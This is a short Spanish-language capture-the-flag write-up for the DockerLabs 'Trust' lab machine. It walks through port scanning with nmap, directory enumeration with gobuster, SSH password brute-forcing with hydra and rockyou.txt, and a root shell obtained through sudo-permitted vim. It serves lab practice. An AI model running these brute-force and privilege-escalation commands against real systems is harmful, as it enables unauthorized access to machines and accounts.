WRITEUP TRUST - DOCKERLABS #
INTRUSIÓN #
RECONOCIMIENTO #
❯ sudo nmap -p- --open -sS --min-rate 5000 -vvv -Pn -n 172.19.0.2 -oG allPorts
PUERTOS #
PUERTO | SERVICIO |
---|---|
22 | SSH |
80 | HTTP |
SERVICIO HTTP #
Página Apache por defecto, vamos a buscar directorios.
❯ gobuster dir -u http://172.19.0.2/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 20 -x html,php,txt,js
Como observamos en pantalla, vemos un usuario llamado “Mario” vamos a ver si con el usuario podemos obtener credenciales para el SSH realizando fuerza bruta al mismo servicio.
❯ hydra -l mario -P /usr/share/wordlists/rockyou.txt ssh://172.19.0.2
Una vez obtenidas estas credenciales, vamos a probarlas en el SSH.
ESCALADA DE PRIVILEGIOS #
Como podemos ver, hemos conseguido acceso al SSH, ahora vamos a probar posibles escaladas de privilegios.
Como vemos, disponemos de “VIM” con permiso SUDO, vamos aver si podemos ejecutar una bash como root abusando de VIM.
❯ sudo /usr/bin/vim -c ':!/bin/bash'